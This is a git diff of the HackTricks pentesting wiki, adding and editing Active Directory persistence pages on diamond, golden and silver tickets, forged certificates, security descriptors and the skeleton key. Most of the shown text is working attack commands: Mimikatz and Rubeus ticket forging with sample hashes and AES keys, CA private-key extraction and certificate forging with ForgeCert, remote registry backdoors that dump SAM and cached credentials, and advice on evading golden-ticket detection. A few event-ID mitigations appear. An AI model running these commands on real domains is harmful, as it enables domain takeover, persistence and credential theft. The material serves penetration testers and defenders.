diff --git a/SUMMARY.md b/SUMMARY.md index 560ac794..f543e4bf 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -163,7 +163,9 @@ * [Custom SSP](windows-hardening/active-directory-methodology/custom-ssp.md) * [DCShadow](windows-hardening/active-directory-methodology/dcshadow.md) * [DCSync](windows-hardening/active-directory-methodology/dcsync.md) + * [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md) * [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md) + * [Forged Certificates](windows-hardening/active-directory-methodology/forged-certificates.md) * [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) * [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md) * [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index b8a29739..76078308 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -### Introduction +## Introduction Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.\ You could see Electron like a local backend+frontend app where **NodeJS** is the **backend** and **chromium** is the **frontend**. @@ -238,6 +238,11 @@ If `contextIsolation` set to false you can try to use \ (similar to \ -Set @{serviceprincipalname="fake/NOTHING"}r + ``` +* Make users vulnerable to [**ASREPRoast** ](asreproast.md) + + ```powershell + Set-DomainObject -Identity -XOR @{UserAccountControl=4194304} + ``` +* Grant [**DCSync**](./#dcsync) privileges to a user + + ```powershell + Add-DomainObjectAcl -TargetIdentity "DC=dev,DC=cyberbotic,DC=io" -PrincipalIdentity bfarmer -Rights DCSync + ``` + +### Silver Ticket + +The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user** (like privileged access to a computer). + +{% content-ref url="silver-ticket.md" %} +[silver-ticket.md](silver-ticket.md) +{% endcontent-ref %} ### Golden Ticket A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain ad the impersonated user. -[**More information about Golden Ticket here.**](golden-ticket.md) +{% content-ref url="golden-ticket.md" %} +[golden-ticket.md](golden-ticket.md) +{% endcontent-ref %} -### Silver Ticket +### Diamond Ticket -The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user** (like privileged access to a computer).\ -[**More information about Silver Ticket here.**](silver-ticket.md) +These are like golden tickets forged in a way that **bypasses common golden tickets detection mechanisms.** + +{% content-ref url="diamond-ticket.md" %} +[diamond-ticket.md](diamond-ticket.md) +{% endcontent-ref %} + +### **Forged Certificates** + +{% content-ref url="forged-certificates.md" %} +[forged-certificates.md](forged-certificates.md) +{% endcontent-ref %} ### AdminSDHolder Group -The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.\ -By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\ +The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins, Backup Operators and krbtgt.\ +By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker **modifies the ACL** of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\ And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group.\ -[**More information about AdminSDHolder Group here**](privileged-accounts-and-token-privileges.md)**.** +****[**More information about AdminDSHolder Group here.**](privileged-accounts-and-token-privileges.md#adminsdholder-group)**** ### DSRM Credentials -There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\ -[**More information about DSRM Credentials here.**](dsrm-credentials.md) +There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user. + +{% content-ref url="dsrm-credentials.md" %} +[dsrm-credentials.md](dsrm-credentials.md) +{% endcontent-ref %} ### ACL Persistence -You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.\ -[**More information about interesting privileges here.**](acl-persistence-abuse.md) +You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**. + +{% content-ref url="acl-persistence-abuse.md" %} +[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% endcontent-ref %} ### Security Descriptors -The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.\ -[**More information about Security Descriptors here**](security-descriptors.md)**.** +The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group. + +{% content-ref url="security-descriptors.md" %} +[security-descriptors.md](security-descriptors.md) +{% endcontent-ref %} ### Skeleton Key -**Modify LSASS** in memory to create a **master password** that will work for any account in the domain.\ -[**More information about Skeleton Key here.**](skeleton-key.md) +**Modify LSASS** in memory to create a **master password** that will work for any account in the domain. + +{% content-ref url="skeleton-key.md" %} +[skeleton-key.md](skeleton-key.md) +{% endcontent-ref %} ### Custom SSP [Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\ You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.\ -[**More information about Custom SSP here**](custom-ssp.md)**.** + + +{% content-ref url="custom-ssp.md" %} +[custom-ssp.md](custom-ssp.md) +{% endcontent-ref %} ### DCShadow It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ -Note that if you use wrong data, pretty ugly logs will appear.\ -[**More information about DCShadow here.**](dcshadow.md) +Note that if you use wrong data, pretty ugly logs will appear. + +{% content-ref url="dcshadow.md" %} +[dcshadow.md](dcshadow.md) +{% endcontent-ref %} ## Forest Privilege Escalation - Domain Trusts diff --git a/windows-hardening/active-directory-methodology/diamond-ticket.md b/windows-hardening/active-directory-methodology/diamond-ticket.md new file mode 100644 index 00000000..df32dae8 --- /dev/null +++ b/windows-hardening/active-directory-methodology/diamond-ticket.md @@ -0,0 +1,67 @@ +# Diamond Ticket + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +## Diamond Ticket + +**Like a golden ticket**, a diamond ticket is a TGT which can be used to **access any service as any user**. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash. + +There are two common techniques to detect the use of golden tickets: + +* Look for TGS-REQs that have no corresponding AS-REQ. +* Look for TGTs that have silly values, such as Mimikatz's default 10-year lifetime. + +A **diamond ticket** is made by **modifying the fields of a legitimate TGT that was issued by a DC**. This is achieved by **requesting** a **TGT**, **decrypting** it with the domain's krbtgt hash, **modifying** the desired fields of the ticket, then **re-encrypting it**. This **overcomes the two aforementioned shortcomings** of a golden ticket because: + +* TGS-REQs will have a preceding AS-REQ. +* The TGT was issued by a DC which means it will have all the correct details from the domain's Kerberos policy. Even though these can be accurately forged in a golden ticket, it's more complex and open to mistakes. + +```bash +# Get user RID +powershell Get-DomainUser -Identity -Properties objectsid + +.\Rubeus.exe diamond /tgtdeleg /ticketuser: /ticketuserid: /groups:512 + +# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host. +# /ticketuser is the username of the principal to impersonate. +# /ticketuserid is the domain RID of that principal. +# /groups are the desired group RIDs (512 being Domain Admins). +# /krbkey is the krbtgt AES256 hash. +``` + +\ + + + + + + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/forged-certificates.md b/windows-hardening/active-directory-methodology/forged-certificates.md new file mode 100644 index 00000000..a1608705 --- /dev/null +++ b/windows-hardening/active-directory-methodology/forged-certificates.md @@ -0,0 +1,64 @@ +# Forged Certificates + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +## Forged Certificates + +Gaining **local admin access to a CA** allows an attacker to extract the **CA private key**, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can obviously be set to any value during setup, sometimes as high as 10+ years. + +Once on a CA, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) can extract the private keys. + +
.\SharpDPAPI.exe certificates /machine
+
+# If Issuer and subject are the distinguished name of the CA, thats the one
+
+# Save the output to a .pem file and convert it to a .pfx with openssl on Kali
+ +Then, save the output to a `.pem` file and convert it to a **`.pfx` with openssl** on Kali. + +Build the forged certificate with [**ForgeCert**](https://github.com/GhostPack/ForgeCert)**:** + +```bash +.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password" +``` + +Even though you can specify any SubjectAltName, the user does need to be present in AD. In this example, the default Administrator account is used.\ +Then we can simply **use Rubeus to request a legitimate TGT** with this forged certificate and use it to access the domain controller: + +```bash +.\Rubeus.exe asktgt /user:Administrator /domain:cyberbotic.io /certificate:MIACAQ[...snip...]IEAAAA /password:password /nowrap +``` + +{% hint style="warning" %} +Note that you aren't limited to forging user certificates, we can do the same for machines. Combine this with the S4U2self trick to gain access to any machine or service in the domain. +{% endhint %} + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/golden-ticket.md b/windows-hardening/active-directory-methodology/golden-ticket.md index 4d4aec18..9f270cd9 100644 --- a/windows-hardening/active-directory-methodology/golden-ticket.md +++ b/windows-hardening/active-directory-methodology/golden-ticket.md @@ -1,4 +1,4 @@ - +# Golden Ticket
@@ -16,13 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Golden ticket -# Golden ticket - -A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user. +A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user.\ +Moreover the **credentials** of **krbtgt** are **never** **changed** automatically. The **krbtgt** account **NTLM hash** can be **obtained** from the **lsass process** or from the **NTDS.dit file** of any DC in the domain. It is also possible to get that NTLM through a **DCsync attack**, which can be performed either with the [lsadump::dcsync](https://github.com/gentilkiwi/mimikatz/wiki/module-\~-lsadump) module of Mimikatz or the impacket example [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). Usually, **domain admin privileges or similar are required**, no matter what technique is used. +It also must be taken into account that it is possible AND **PREFERABLE** (opsec) to **forge tickets using the AES Kerberos keys (AES128 and AES256)**. + {% code title="From Linux" %} ```bash python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus @@ -33,24 +35,47 @@ python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass {% code title="From Windows" %} ```bash -mimikatz # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt +#mimikatz +kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt .\Rubeus.exe ptt /ticket:ticket.kirbi klist #List tickets in memory + +# Example using aes key +kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi ``` {% endcode %} **Once** you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell (looks like yo can not get a shell via winrm). -## Mitigation +### Bypassing common detections -Golden ticket events ID: +The most frequent ways to detect a golden ticket are by **inspecting Kerberos traffic** on the wire. By default, Mimikatz **signs the TGT for 10 years**, which will stand out as anomalous in subsequent TGS requests made with it. + +`Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM` + +Use the `/startoffset`, `/endin` and `/renewmax` parameters to control the start offset, duration and the maximum renewals (all in minutes). + +``` +Get-DomainPolicy | select -expand KerberosPolicy +``` + +Unfortunately, the TGT's lifetime is not logged in 4769's, so you won't find this information in the Windows event logs. However, what you can correlate is **seeing 4769's **_**without**_** a prior 4768**. It's **not possible to request a TGS without a TGT**, and if there is no record of a TGT being issued, we can infer that it was forged offline. + +In order to **bypass this detection** check the diamond tickets: + +{% content-ref url="diamond-ticket.md" %} +[diamond-ticket.md](diamond-ticket.md) +{% endcontent-ref %} + +### Mitigation * 4624: Account Logon * 4672: Admin Logon * `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property` -[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets) +Other little tricks defenders can do is **alert on 4769's for sensitive users** such as the default domain administrator account. +[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
@@ -67,5 +92,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/security-descriptors.md b/windows-hardening/active-directory-methodology/security-descriptors.md index 12a07772..a555598b 100644 --- a/windows-hardening/active-directory-methodology/security-descriptors.md +++ b/windows-hardening/active-directory-methodology/security-descriptors.md @@ -1,4 +1,4 @@ - +# Security Descriptors
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Security Descriptors +## Security Descriptors Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;` @@ -25,6 +24,8 @@ The **security descriptors** are used to **store** the **permissions** an **obje Then, this persistence technique is based on the hability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin. +### Access to WMI + You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1): ```bash @@ -32,6 +33,8 @@ Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove ``` +### Access to WinRM + Give access to **winrm PS console to a user** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:** ```bash @@ -39,15 +42,25 @@ Set-RemotePSRemoting -UserName student1 -ComputerName -Verbose Set-RemotePSRemoting -UserName student1 -ComputerName -Remove #Remove ``` +### Remote access to hashes + Access the **registry** and **dump hashes** creating a **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** so you can at any moment retrieve the **hash of the computer**, the **SAM** and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**: ```bash +# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials. Add-RemoteRegBackdoor -ComputerName -Trustee student1 -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine. Get-RemoteMachineAccountHash -ComputerName -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine. Get-RemoteLocalAccountHash -ComputerName -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine. Get-RemoteCachedCredential -ComputerName -Verbose ``` +Check [**Silver Tickets**](silver-ticket.md) to learn how you could use the hash of the computer account of a Domain Controller.
@@ -64,5 +77,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/silver-ticket.md b/windows-hardening/active-directory-methodology/silver-ticket.md index 18f9390a..9e3e9f12 100644 --- a/windows-hardening/active-directory-methodology/silver-ticket.md +++ b/windows-hardening/active-directory-methodology/silver-ticket.md @@ -28,9 +28,9 @@ If you are interested in **hacking carer** and hack the unhackable - **we are hi The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user**. -In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default. +In this case, the NTLM **hash of a computer account** (which is kind of a user account in AD) is **owned**. Hence, it is possible to **craft** a **ticket** in order to **get into that machine** with **administrator** privileges through the SMB service. The computer accounts reset their passwords every 30 days by default. -It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256). To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372). +It also must be taken into account that it is possible AND **PREFERABLE** (opsec) to **forge tickets using the AES Kerberos keys (AES128 and AES256)**. To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372). {% code title="Linux" %} ```bash @@ -51,6 +51,9 @@ mimikatz.exe "kerberos::ptt ticket.kirbi" .\Rubeus.exe ptt /ticket:ticket.kirbi #Obtain a shell .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd + +#Example using aes key +kerberos::golden /user:Administrator /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /target:labwws02.jurassic.park /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi ``` {% endcode %} diff --git a/windows-hardening/active-directory-methodology/skeleton-key.md b/windows-hardening/active-directory-methodology/skeleton-key.md index d9ce88af..68d1a18c 100644 --- a/windows-hardening/active-directory-methodology/skeleton-key.md +++ b/windows-hardening/active-directory-methodology/skeleton-key.md @@ -1,4 +1,4 @@ - +# Skeleton Key
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# **Skeleton Key** +## **Skeleton Key** **From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/) @@ -47,9 +46,7 @@ If lsass was **already patched** with skeleton, then this **error** will appear: ![](<../../.gitbook/assets/image (160).png>) -## Mitigations - -Skeleton Key +### Mitigations * Events: * System Event ID 7045 - A service was installed in the system. (Type Kernel Mode driver) @@ -62,7 +59,6 @@ Skeleton Key * `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose` * Verify after reboot: `Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "`_`protected process"}`_ -
Support HackTricks and get benefits! @@ -78,5 +74,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -